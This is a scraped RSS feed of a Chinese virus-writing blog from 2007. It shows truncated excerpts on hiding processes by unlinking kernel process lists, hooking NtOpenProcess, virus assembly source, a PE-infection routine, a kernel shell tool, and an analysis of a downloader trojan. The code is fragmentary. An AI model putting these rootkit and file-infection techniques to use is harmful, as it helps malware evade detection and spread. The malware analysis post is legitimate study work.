VX Z0ne http://romio64.blogbus.com by blogbus.com Thu, 01 Jan 1970 07:00:00 +0700 http://public.blogbus.com/profile/4/7/4/8474/avatar_8474_96.jpg VX Z0ne http://romio64.blogbus.com 修改活动进程链隐藏进程 typedef struct _proc_info
{
DWORD dwPIDOffset;//PID偏移(相对于EPROCESS,下同)
DWORD dwAPLOffset;//ActiveProcessLink偏移
DWORD dwProcNameOffset ;//进程名偏移
char szProcName[16] ;//要隐藏的进程名
}proc_info ;
//取当前进程的EPROCESS
         //遍历ACTIVEPROCESSLINK,遇到要隐藏的进程则用RemoveEn...

随机文章:

进程保护 2007-07-25
ATool的问题 2007-06-28

收藏到:Del.icio.us


风尚频道——国内顶尖的时尚族群汇聚于此,未必是流行,但一定要有品位。


]]> http://romio64.blogbus.com/logs/10303526.html robinh00d Mon, 15 Oct 2007 16:52:34 +0800 进程保护 没啥说的。。。挂钩NtOpenProcess
#include "ntddk.h"

#define FILE_DEVICE_PROTECTPROC 0x8000
#define PROTECTPROC_IOCTL_BASE 0x800
#define CTL_CODE_PROTECTPROC(i) CTL_CODE(FILE_DEVICE_PROTECTPROC, PROTECTPROC_IOCTL_BASE+i, METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PROTECTPROC_...

随机文章:

ATool的问题 2007-06-28
OllyDbg's fault 2007-06-21

收藏到:Del.icio.us


《城客》:第一本中文互动杂志!


]]> http://romio64.blogbus.com/logs/7049623.html robinh00d Wed, 25 Jul 2007 16:58:32 +0800 Virus.Win32.Mock .386
.model flat,stdcall
option casemap:none

include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib

VirusSize equ (offset virus_end - offset virus_start)


随机文章:


收藏到:Del.icio.us


推荐:让我们寻找最优秀的Blogger!


]]> http://romio64.blogbus.com/logs/6486203.html robinh00d Sat, 07 Jul 2007 17:16:53 +0800 ATool的问题
lkd> u 85b0a1e8
85b0a1e8 8b542408        mov     edx,dword ptr [esp+8]
85b0a1ec 8d4c2404        lea     ecx,[esp+4]

随机文章:

进程保护 2007-07-25
第一帖 2007-06-21

收藏到:Del.icio.us


行者频道——从普通游客到资深背包族,跟随Ta们的镜头游遍全世界。


]]> http://romio64.blogbus.com/logs/6182650.html robinh00d Thu, 28 Jun 2007 09:50:47 +0800 检查Windows所使用的内核及HAL的原始版本 * Filename CheckKernel.c
*
* Author: kcrazy
* Email: thekcrazy@gmail.com
*
* Description: 检查Windows所使用的内核及HAL的原始版本
*
* Date: 2007-4-27 Original from kcrazy
*
* Version: 1.0
=================================...

随机文章:

进程保护 2007-07-25
ATool的问题 2007-06-28
关于狙剑 2007-06-21

收藏到:Del.icio.us


风尚频道——国内顶尖的时尚族群汇聚于此,未必是流行,但一定要有品位。


]]> http://romio64.blogbus.com/logs/6132148.html robinh00d Mon, 25 Jun 2007 16:14:41 +0800 修改PE的e_lfnew感染法 仍然属于bind infection的一种,只不过他是把宿主文件的e_lfanew指向了后面病毒PE的PE HEADER,我测试了一下,如果PE HEADER的SizeOfHeaders大于4k的话程序就不能被load,也就是说宿主程序大小+病毒的所有头大小+病毒的节表大小不能大于4K,这样的话这种感染方式就没有实用价值了。
以上说法如有错误,请批评指正嘿嘿~
BOOL CInfection::InfectFile(LPCTSTR lpVirus, LPCTSTR lpHost)
{
CFileMap fm(lpHost) ;

DWORD dwHostSize = fm.GetSize() ;

if (0 == dwHos...

随机文章:

Virus.Win32.Mock 2007-07-07
OllyDbg's fault 2007-06-21

收藏到:Del.icio.us


《城客》:第一本中文互动杂志!


]]> http://romio64.blogbus.com/logs/6131989.html robinh00d Mon, 25 Jun 2007 15:54:35 +0800 一个内核级的Shell工具源代码 ;@echo off
;goto make

;********************************************************************
;author :dge
;homepage:http://llfdge.googlepages.com/
;date :2007.3.16
;********************************************************************

.386
.model flat, stdcall
option casemap:none

include d:\masm32\include\w2k\ntstat...

随机文章:

「顶」拉票~ 2009-11-16
进程保护 2007-07-25
ATool的问题 2007-06-28

收藏到:Del.icio.us


行者频道——从普通游客到资深背包族,跟随Ta们的镜头游遍全世界。


]]> http://romio64.blogbus.com/logs/6131954.html robinh00d Mon, 25 Jun 2007 15:51:41 +0800 Virus.Win32.Downloader.c分析 首先用PEID扫描一下没有扫描出壳或者编译器特征,入口点RVA是0x70000,进一步使用PE分析工具查看关键的数据信息,我这里使用的是PEInfo:可以看到,代码入口不是在常规的.text节里而是在.rdata节里
再看输入表信息:输入表的RVA是0x70660,程序只导入了kernel32.dll里的GetProcAddress和LoadLibraryA这两个函数。

下面是详细的代码分析:

; 重定位到当前导入表
00470005 68 90184000 PUSH QQLiveUp.00401890
0047000A E8 71020000 CALL QQLiveUp.00470280

随机文章:

Virus.Win32.Mock 2007-07-07

收藏到:Del.icio.us


行者频道——从普通游客到资深背包族,跟随Ta们的镜头游遍全世界。


]]> http://romio64.blogbus.com/logs/6131875.html robinh00d Mon, 25 Jun 2007 15:45:46 +0800 Mein Herz Brennt巴黎现场

随机文章:

进程保护 2007-07-25
ATool的问题 2007-06-28

收藏到:Del.icio.us


行者频道——从普通游客到资深背包族,跟随Ta们的镜头游遍全世界。


]]> http://romio64.blogbus.com/logs/6052044.html robinh00d Thu, 21 Jun 2007 17:41:44 +0800 OllyDbg's fault 原来是修改了NumOfRvaAndSizes字段,一般情况下都是0x10

...

随机文章:

Virus.Win32.Mock 2007-07-07

收藏到:Del.icio.us


色界频道——这里有顶尖的摄影大师,也有摄影爱好者,他们用相机收纳大千世界。


]]> http://romio64.blogbus.com/logs/6051894.html robinh00d Thu, 21 Jun 2007 17:22:50 +0800